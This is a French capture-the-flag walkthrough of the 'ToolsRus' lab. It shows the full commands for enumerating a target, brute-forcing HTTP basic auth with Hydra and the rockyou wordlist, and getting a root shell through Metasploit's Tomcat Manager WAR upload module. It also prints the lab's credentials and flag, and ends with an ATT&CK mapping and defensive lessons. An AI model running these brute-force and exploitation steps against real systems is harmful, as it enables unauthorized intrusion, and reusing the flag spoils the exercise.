Introduction
ToolsRus est une room d'introduction aux outils de pentesting. On enchaîne énumération, brute force et exploitation pour compromettre un serveur Tomcat.
Outils utilisés : Nmap, Gobuster, Hydra, Nikto, Metasploit
Reconnaissance
Scan Nmap
nmap -sC -sV <IP>

Services découverts :
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH |
| 80 | HTTP | Apache |
| 1234 | HTTP | Apache Tomcat/Coyote JSP engine 1.1 |
Énumération Web
Gobuster
gobuster dir -u http:// -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Répertoires découverts :
/guidelines→ Contient un nom d'utilisateur/protected→ Authentification basique requise
En visitant /guidelines, on trouve un nom : bob.
Brute Force avec Hydra
Le répertoire /protected demande une authentification. On utilise Hydra avec l'utilisateur bob :
hydra -l bob -P /usr/share/wordlists/rockyou.txt <IP> http-get /protected

Credentials : bob:bubbles
Énumération Tomcat
Le port 1234 héberge un serveur Tomcat. On scanne avec Nikto en utilisant les credentials trouvés :
nikto -h http://:1234/manager/html -id bob:bubbles

Informations obtenues :
- Tomcat Manager accessible
- Version Apache-Coyote :
1.1 - Plusieurs vulnérabilités potentielles
Exploitation avec Metasploit
Tomcat Manager permet d'uploader des fichiers WAR. On exploite cette fonctionnalité :
msfconsole
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <IP>
set RPORT 1234
set HttpUsername bob
set HttpPassword bubbles
exploit
On obtient un shell avec les privilèges root.
Flag
cat /root/flag.txt

Flag : ff1fc4a81affcc7688cf89ae7dc6e0e1
Résumé de l'attaque
| Étape | Outil | Résultat |
|---|---|---|
| Scan ports | Nmap | Ports 22, 80, 1234 |
| Enum directories | Gobuster | /guidelines, /protected |
| Brute force | Hydra | bob:bubbles |
| Scan vulns | Nikto | Tomcat Manager exposé |
| Exploitation | Metasploit | Shell root |
Mapping MITRE ATT&CK
| Technique | ID | Observation |
|---|---|---|
| Network Service Discovery | T1046 | Scan Nmap |
| Brute Force | T1110 | Hydra sur /protected |
| Valid Accounts | T1078 | Credentials bob:bubbles |
| Exploit Public-Facing Application | T1190 | Tomcat Manager upload |
Leçons apprises
- Restreindre l'accès à Tomcat Manager par IP ou VPN
- Mots de passe faibles = compromission garantie
- Énumération est la clé avant toute exploitation
- Séparer les credentials entre les services
Pratiquer sur CyberPath
- SOC Triage Trainer - Détecter ce type d'attaque
- MITRE ATT&CK Explorer - Techniques utilisées
- Log Analyzer - Analyser les traces laissées
